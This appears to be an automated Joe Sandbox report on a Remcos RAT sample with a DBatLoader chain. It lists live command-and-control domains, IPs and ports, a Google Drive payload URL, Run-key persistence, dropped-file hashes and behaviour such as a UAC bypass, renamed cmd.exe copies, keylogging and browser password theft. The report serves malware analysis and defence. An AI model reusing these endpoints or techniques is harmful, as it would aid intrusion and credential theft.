                  Command and Control: 12 Ingress Tool Transfer; 21 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 2 Non-Application Layer Protocol; 213 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium
                  Impact: 1 System Shutdown/Reboot; 1 Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking
                  Behavior Graph ID: 1562870 | Sample: AWkpqJMxci.exe | Start date: 26/11/2024 | Architecture: WINDOWS | Score: 100

                  Sample-level network indicators: ogcmaw.duckdns.org; emberluck.duckdns.org; 2 other IPs or domains
                  Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures; Uses dynamic DNS services (emberluck.duckdns.org)

                  Process tree (reconstructed from the behavior graph; indentation shows which process started which):

                  AWkpqJMxci.exe
                    Network: drive.usercontent.google.com 142.250.181.33, 443, 49730, 49731, GOOGLEUS United States
                    Dropped: C:\Users\Public\Libraries\rlyzsazB.cmd (DOS); C:\Users\Public\Libraries\Bzaszylr (data); C:\Users\Public\Bzaszylr.url (MS)
                    Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection); 2 other signatures
                    colorcpl.exe
                      Network: emberluck.duckdns.org 192.169.69.26, 2500, 49733, 49741, WOWUS United States; ogcmaw.duckdns.org 162.216.243.15, 2404, 49732, 49740, DYNUUS United States
                      Signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionality to change the wallpaper; Contains functionality to register a low level keyboard hook
                    cmd.exe
                      esentutl.exe
                        Dropped: C:\Users\Public\alpha.pif (PE32)
                        Signatures: Drops PE files to the user root directory; Drops PE files with a suspicious file extension; Drops or copies cmd.exe with a different name (likely to bypass HIPS)
                      alpha.pif
                        xpha.pif
                          Network: 127.0.0.1 unknown unknown
                      esentutl.exe
                        Dropped: C:\Users\Public\xpha.pif (PE32)
                      6 other processes
                    esentutl.exe
                      Dropped: C:\Users\Public\Libraries\Bzaszylr.PIF (PE32)
                      conhost.exe
                  Bzaszylr.PIF
                    Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                    SndVol.exe
                      Signatures: Contains functionality to steal Chrome passwords or cookies; Contains functionality to steal Firefox passwords or cookies; Delayed program exit found
                  Bzaszylr.PIF
                    colorcpl.exe

                  Source | Detection | Scanner | Label | Link
                  AWkpqJMxci.exe | 71% | ReversingLabs | Win32.Backdoor.Remcos
                  AWkpqJMxci.exe | 100% | Avira | TR/AD.Nekark.gwqnm
                  AWkpqJMxci.exe | 100% | Joe Sandbox ML
                  Source | Detection | Scanner | Label | Link
                  C:\Users\Public\Libraries\Bzaszylr.PIF | 100% | Avira | TR/AD.Nekark.gwqnm
                  C:\Users\Public\Libraries\Bzaszylr.PIF | 100% | Joe Sandbox ML
                  C:\Users\Public\Libraries\Bzaszylr.PIF | 71% | ReversingLabs | Win32.Backdoor.Remcos
                  C:\Users\Public\alpha.pif | 0% | ReversingLabs
                  C:\Users\Public\xpha.pif | 0% | ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  ogcmaw.duckdns.org | 0% | Avira URL Cloud | safe
                  emberluck.duckdns.org | 0% | Avira URL Cloud | safe
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
                  ogcmaw.duckdns.org | 162.216.243.15 | true | true | | unknown
                  drive.usercontent.google.com | 142.250.181.33 | true | false | | high
                  emberluck.duckdns.org | 192.169.69.26 | true | true | | unknown
                  Name | Malicious | Antivirus Detection | Reputation
                  ogcmaw.duckdns.org | true | Avira URL Cloud: safe | unknown
                  https://drive.usercontent.google.com/download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0 | false | | high
                  emberluck.duckdns.org | true | Avira URL Cloud: safe | unknown
                  Name | Source | Malicious | Antivirus Detection | Reputation
                  http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp | false | | high
                  http://geoplugin.net/json.gp | colorcpl.exe, SndVol.exe | false | | high
                  https://sectigo.com/CPS0 | AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp | false | | high
                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp | false | | high
                  http://ocsp.sectigo.com0 | AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp | false | | high
                  http://geoplugin.net/json.gp/C | colorcpl.exe, 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp | false | | high
                  https://drive.usercontent.google.com/download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0? | AWkpqJMxci.exe, 00000000.00000002.1781709227.00000000007A1000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp | false | | high
                  https://drive.usercontent.google.com/ | AWkpqJMxci.exe, 00000000.00000002.1781709227.0000000000785000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp | false | | high
                  http://www.pmail.com | AWkpqJMxci.exe, AWkpqJMxci.exe, 00000000.00000002.1805021411.000000007FB50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp | false | | high
                  http://ocsp.sectigo.com0C | AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp | false | | high
                  https://drive.usercontent.google.com:443/download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0x | AWkpqJMxci.exe, 00000000.00000002.1781709227.00000000007AD000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                  IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                  142.250.181.33 | drive.usercontent.google.com | United States | | 15169 | GOOGLEUS | false
                  192.169.69.26 | emberluck.duckdns.org | United States | | 23033 | WOWUS | true
                  162.216.243.15 | ogcmaw.duckdns.org | United States | | 398019 | DYNUUS | true
                                                      IP
                                                      127.0.0.1
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1562870
                                                      Start date and time:2024-11-26 08:23:09 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 11m 13s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:23
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:AWkpqJMxci.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:096394b733ca53e65afa06302776c52330f2567d665a42e0c5463fe23c523e62.exe
                                                      Detection:MAL
                                                      Classification:mal100.rans.troj.spyw.expl.evad.winEXE@34/10@9/4
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 96
                                                      • Number of non-executed functions: 182
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 20.3.187.198, 40.69.42.241
                                                      • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: AWkpqJMxci.exe
Timeline:
• Time: 02:24:00, Type: API Interceptor, Description: 2x Sleep call for process: AWkpqJMxci.exe modified
• Time: 02:24:22, Type: API Interceptor, Description: 2x Sleep call for process: Bzaszylr.PIF modified
• Time: 02:24:47, Type: API Interceptor, Description: 3770375x Sleep call for process: colorcpl.exe modified
• Time: 07:24:13, Type: Autostart, Description: Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Bzaszylr C:\Users\Public\Bzaszylr.url
• Time: 07:24:22, Type: Autostart, Description: Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Bzaszylr C:\Users\Public\Bzaszylr.url
Associated samples (Match, Associated Sample Name / URL, Detection, Threat Name, Context):

Match: 192.169.69.26
• Sample: SX8OLQP63C.exe, Detection: malicious, Threat Name: VjW0rm, AsyncRAT, RATDispenser, Context: yuya0415.duckdns.org:1928/Vre
• Sample: confirmación y corrección de la dirección de entrega.vbs, Detection: malicious, Threat Name: Unknown, Context: servidorarquivos.duckdns.org/e/e
• Sample: oKtkBYZMWl.exe, Detection: malicious, Threat Name: Unknown, Context: csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
• Sample: oKtkBYZMWl.exe, Detection: malicious, Threat Name: Unknown, Context: csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
• URL: http://yvtplhuqem.duckdns.org/ja/, Detection: malicious, Threat Name: Unknown, Context: yvtplhuqem.duckdns.org/ja/
• URL: http://fqqqffcydg.duckdns.org/en/, Detection: malicious, Threat Name: Unknown, Context: fqqqffcydg.duckdns.org/en/
• URL: http://yugdzvsqnf.duckdns.org/en/, Detection: malicious, Threat Name: Unknown, Context: yugdzvsqnf.duckdns.org/en/
• Sample: &nuevo_pedido#..vbs, Detection: malicious, Threat Name: Unknown, Context: servidorarquivos.duckdns.org/e/e
• Sample: transferencia_Hsbc.xlsx, Detection: malicious, Threat Name: Unknown, Context: servidorarquivos.duckdns.org/e/e
• URL: http://www.secure-0fflce-o365.duckdns.org/, Detection: malicious, Threat Name: Unknown, Context: www.secure-0fflce-o365.duckdns.org/

Match: emberluck.duckdns.org
• Sample: nNGLl351Fq.exe, Detection: malicious, Threat Name: AveMaria, DBatLoader, UACMe, Context: 172.81.61.215
• Sample: BAR9WigoSh.exe, Detection: malicious, Threat Name: Remcos, DBatLoader, Context: 172.81.61.215
• Sample: RFQ_New_Tube_Bundle_of_E-2419.exe, Detection: malicious, Threat Name: Remcos, DBatLoader, Context: 146.70.79.79
• Sample: 7rl9yBsGXL.exe, Detection: malicious, Threat Name: NetWire, DBatLoader, Context: 146.70.79.79

Match: bg.microsoft.map.fastly.net
• Sample: file.exe, Detection: malicious, Threat Name: Amadey, Stealc, Vidar, Context: 199.232.214.172
• Sample: Fumari INC.eml, Detection: malicious, Threat Name: Unknown, Context: 199.232.210.172
• Sample: fpAb6lVZ9A.dll, Detection: malicious, Threat Name: CobaltStrike, Context: 199.232.214.172
• Sample: Customer forms.pdf, Detection: malicious, Threat Name: Unknown, Context: 199.232.214.172
• Sample: IJ9n6ms5CT.exe, Detection: malicious, Threat Name: Unknown, Context: 199.232.210.172
• Sample: Evidence of copyright infringement.bat, Detection: malicious, Threat Name: Unknown, Context: 199.232.214.172
• Sample: AccountDocuments - christinal.docx, Detection: malicious, Threat Name: Unknown, Context: 199.232.214.172
• Sample: Disputes.accdb, Detection: malicious, Threat Name: Unknown, Context: 199.232.214.172
• Sample: ZwmyzMxFKL.exe, Detection: malicious, Threat Name: BlackMoon, Context: 199.232.210.172
• Sample: PVJ6cLZQ0T.xls, Detection: malicious, Threat Name: Unknown, Context: 199.232.214.172

Match: ogcmaw.duckdns.org
• Sample: RFQ_New_Tube_Bundle_of_E-2419.exe, Detection: malicious, Threat Name: Remcos, DBatLoader, Context: 146.70.79.79

Match: DYNUUS
• Sample: winst.exe, Detection: malicious, Threat Name: Unknown, Context: 162.216.242.206
• Sample: winst.exe, Detection: malicious, Threat Name: Unknown, Context: 162.216.242.206
• URL: https://ids.calfrom.org/, Detection: malicious, Threat Name: Unknown, Context: 142.202.190.16
• URL: http://c0vudiyvuu.theworkpc.com/#cl/82_md/2/11/263/6/44456, Detection: malicious, Threat Name: Unknown, Context: 162.216.242.206
• Sample: EEwABOSd8h.exe, Detection: malicious, Threat Name: Remcos, DBatLoader, Context: 142.202.189.94
• Sample: Order151smapl.exe, Detection: malicious, Threat Name: Remcos, DBatLoader, Context: 142.202.190.140
• Sample: n6dS0UI5yA.exe, Detection: malicious, Threat Name: Remcos, DBatLoader, Context: 142.202.191.238
• Sample: payslip2833.exe, Detection: malicious, Threat Name: Remcos, DBatLoader, Context: 142.202.189.215
• Sample: payslip2833.exe, Detection: malicious, Threat Name: Remcos, DBatLoader, Context: 142.202.189.215
• Sample: Invfile2123.exe, Detection: malicious, Threat Name: Remcos, DBatLoader, Context: 142.202.189.215

Match: WOWUS
• Sample: D2pQ4J4GGZ.exe, Detection: malicious, Threat Name: Remcos, DBatLoader, Context: 192.169.69.26
• Sample: decode_6ec70947443cc64628fe11013d0e752591680ef46c9a78ec1409313d6669bdf9.exe, Detection: malicious, Threat Name: XWorm, Context: 192.169.69.26
• Sample: ibTSSrn71X.exe, Detection: malicious, Threat Name: AsyncRAT, Context: 192.169.69.26
• Sample: Dxnrbs22FC.exe, Detection: malicious, Threat Name: AsyncRAT, Context: 192.169.69.26
• Sample: QUOTATION #46789RFQ_SUPLMS_NOV24_SALEH_CONSTRUCTIONS_LLC_PDF.exe, Detection: malicious, Threat Name: Remcos, DarkTortilla, Context: 192.169.69.26
• URL: http://updatechrome.duckdns.org/1234567890.functions, Detection: malicious, Threat Name: Unknown, Context: 192.169.69.25
• Sample: file.exe, Detection: malicious, Threat Name: PureLog Stealer, XWorm, Context: 192.169.69.26
• Sample: SPA-0987-ORDER.exe, Detection: malicious, Threat Name: Remcos, Context: 192.169.69.26
• Sample: seemebestthingswhichevermadebybestthingsgodown.hta, Detection: malicious, Threat Name: Cobalt Strike, Remcos, HTMLPhisher, Context: 192.169.69.26
• Sample: CI.xls, Detection: malicious, Threat Name: Remcos, HTMLPhisher, Context: 192.169.69.26

Match: a0e9f5d64349fb13191bc781f81f42e1
• Sample: D2pQ4J4GGZ.exe, Detection: malicious, Threat Name: Remcos, DBatLoader, Context: 142.250.181.33
• Sample: C6dAUcOA6M.exe, Detection: malicious, Threat Name: AgentTesla, DBatLoader, PureLog Stealer, Context: 142.250.181.33
• Sample: 2jbMIxCFsK.exe, Detection: malicious, Threat Name: AgentTesla, DBatLoader, Context: 142.250.181.33
• Sample: 9oKqST-uPDy7iigkXM-C5J2.eml, Detection: malicious, Threat Name: Unknown, Context: 142.250.181.33
• Sample: 1m181Ru74o.exe, Detection: malicious, Threat Name: Remcos, DBatLoader, Context: 142.250.181.33
• Sample: jlPBMMQbXC.exe, Detection: malicious, Threat Name: DBatLoader, Remcos, Context: 142.250.181.33
• Sample: qqig1mHX8U.exe, Detection: malicious, Threat Name: AveMaria, DBatLoader, UACMe, Context: 142.250.181.33
• Sample: nft438A5fN.exe, Detection: malicious, Threat Name: DBatLoader, Remcos, Context: 142.250.181.33
• Sample: 6BE4RDldhw.exe, Detection: malicious, Threat Name: DBatLoader, Context: 142.250.181.33
• Sample: AnyDesk.exe, Detection: malicious, Threat Name: DBatLoader, Context: 142.250.181.33

Match: C:\Users\Public\alpha.pif
• Sample: D2pQ4J4GGZ.exe, Detection: malicious, Threat Name: Remcos, DBatLoader
• Sample: C6dAUcOA6M.exe, Detection: malicious, Threat Name: AgentTesla, DBatLoader, PureLog Stealer
• Sample: 2jbMIxCFsK.exe, Detection: malicious, Threat Name: AgentTesla, DBatLoader
• Sample: 1m181Ru74o.exe, Detection: malicious, Threat Name: Remcos, DBatLoader
• Sample: jlPBMMQbXC.exe, Detection: malicious, Threat Name: DBatLoader, Remcos
• Sample: qqig1mHX8U.exe, Detection: malicious, Threat Name: AveMaria, DBatLoader, UACMe
• Sample: nft438A5fN.exe, Detection: malicious, Threat Name: DBatLoader, Remcos
• Sample: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat, Detection: malicious, Threat Name: AgentTesla, DBatLoader
• Sample: IBKB.vbs, Detection: malicious, Threat Name: AgentTesla, DBatLoader, PureLog Stealer
• Sample: USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe, Detection: malicious, Threat Name: Remcos, DBatLoader
                                                                          Process:C:\Users\user\Desktop\AWkpqJMxci.exe
                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Bzaszylr.PIF">), ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):104
                                                                          Entropy (8bit):5.137503781179706
                                                                          Encrypted:false
                                                                          SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMLACIvsbxHXAIv:HRYFVmTWDyz0tSExwS
                                                                          MD5:D7A9298F5915479772B4D29CA8AB9AC5
                                                                          SHA1:7FD4E1CFFF79D25F8EF255F426CEFAEADE7C066C
                                                                          SHA-256:26924262FAAB2021A7E9D341D8D81EDA6690B9DA0947840298DF3C182F165287
                                                                          SHA-512:9111C7C1D9D1D1D6B039BA7068260FC20BB61DEEB707DE8C9CF75F95E740F72184E4C199B3B40989B94C77B0FFDAA27713370CFA4709019F243B488D2DA484FD
                                                                          Malicious:true
                                                                          Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Bzaszylr.PIF"..IconIndex=987617..HotKey=73..
                                                                          Process:C:\Users\user\Desktop\AWkpqJMxci.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):803600
                                                                          Entropy (8bit):7.399331705226032
                                                                          Encrypted:false
                                                                          SSDEEP:24576:MW9nQUcR5xKPmdygwpAeodt00e8JbC+UFlf:3JQ/cPGyTpAZjbC+U3f
                                                                          MD5:C6B36E051D3FBF1D162303586D8D3FC8
                                                                          SHA1:F23C7A777169D3467CBC1CCA6C9D9E8427ACCA1F
                                                                          SHA-256:92FFFFA82890005940FB1D797FEB8E7D68F5314C0391E8CF1F40C0ABAA6DA626
                                                                          SHA-512:86BA7E3E30244425C45FEF8021865639A48EF0A8933384A830656560421E14D1430B6A7E711E9984886D0BF11E2D89C124B3C0235F122E41E3405A4F88D34661
                                                                          Malicious:true
                                                                          Process:C:\Windows\SysWOW64\esentutl.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1339392
                                                                          Entropy (8bit):7.186865824174257
                                                                          Encrypted:false
                                                                          SSDEEP:24576:lXcmzpu+0sDG7JD/7YnmDPd037ElJo7gZtnrQ5VlPgemhs2u+/T:lXZpxDfmS3wvo0ZtrQ5VZQhsD+/T
                                                                          MD5:B4E2055B4877DCFCBF9A366106B15591
                                                                          SHA1:459F7B89E83D5BE3581029DCA3BB32D4C97D8156
                                                                          SHA-256:096394B733CA53E65AFA06302776C52330F2567D665A42E0C5463FE23C523E62
                                                                          SHA-512:AFAFADA21255956613393E13F8D67B1A4D1DA780CAD6CEDC4BB5C01B3B17863E29E981548959B0790E2F40A2498FB6A04070289C551E2489E652B0E3E0525107
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                                          Process:C:\Users\user\Desktop\AWkpqJMxci.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):4
                                                                          Entropy (8bit):2.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:pvn:Bn
                                                                          MD5:778300BD8587672716B777C1C3F07C14
                                                                          SHA1:EF2781BBE133C16ADB6600F5D01C3683F584384E
                                                                          SHA-256:CC40D093B4B0AA5F9CE40061B3489183AAB268DA0BE0400DEE53E5A6480D9346
                                                                          SHA-512:265A83B0F14B57BA28203DDF96115EE404C34AC3DAF8CBA31E38B63DAEB31A84454B21B215AD603CA0EF424FAA11E1D003BC3F1510639A73A01929121513C2F0
                                                                          Malicious:false
                                                                          Preview:29..
                                                                          Process:C:\Users\user\Desktop\AWkpqJMxci.exe
                                                                          File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):62357
                                                                          Entropy (8bit):4.705712327109906
                                                                          Encrypted:false
                                                                          SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                          MD5:B87F096CBC25570329E2BB59FEE57580
                                                                          SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                          SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                          SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                          Malicious:true
                                                                          Process:C:\Windows\SysWOW64\esentutl.exe
                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):236544
                                                                          Entropy (8bit):6.4416694948877025
                                                                          Encrypted:false
                                                                          SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                          MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                          SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                          SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
• Filename: D2pQ4J4GGZ.exe, Detection: malicious
• Filename: C6dAUcOA6M.exe, Detection: malicious
• Filename: 2jbMIxCFsK.exe, Detection: malicious
• Filename: 1m181Ru74o.exe, Detection: malicious
• Filename: jlPBMMQbXC.exe, Detection: malicious
• Filename: qqig1mHX8U.exe, Detection: malicious
• Filename: nft438A5fN.exe, Detection: malicious
• Filename: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat, Detection: malicious
• Filename: IBKB.vbs, Detection: malicious
• Filename: USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe, Detection: malicious
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

Process:C:\Windows\SysWOW64\esentutl.exe
                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18944
                                                                          Entropy (8bit):5.742964649637377
                                                                          Encrypted:false
                                                                          SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                          MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                          SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                          SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                          SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\SysWOW64\esentutl.exe
                                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                                          Category:dropped
                                                                          Size (bytes):589
                                                                          Entropy (8bit):4.666389644974742
                                                                          Encrypted:false
                                                                          SSDEEP:12:qb8GAvdxTzQmeSbZ7u0wxDDDDDDDDjCaY5T96aYA996TB8NGNJ:K8GwxTzQmp7u0wQakT96a796t8Nc
                                                                          MD5:DBE57BF0E0A34E98DC2C36FD5B415A93
                                                                          SHA1:8F9C547A8FDF13EA7065459EDB7DF9A24C656EE6
                                                                          SHA-256:D7D88B46ECEC61F15A9CEDCC533BC786068FA7D8F0259549968A8CA527DB8631
                                                                          SHA-512:8D3EFA922CB890180DA7B0D38A90862A397F26D1C296A1240292BA0C26FA85D814BE8C8BC3AAC483176D33B51EDA995728A29A2626AFCE510EC2BE270BEA971B
                                                                          Malicious:false
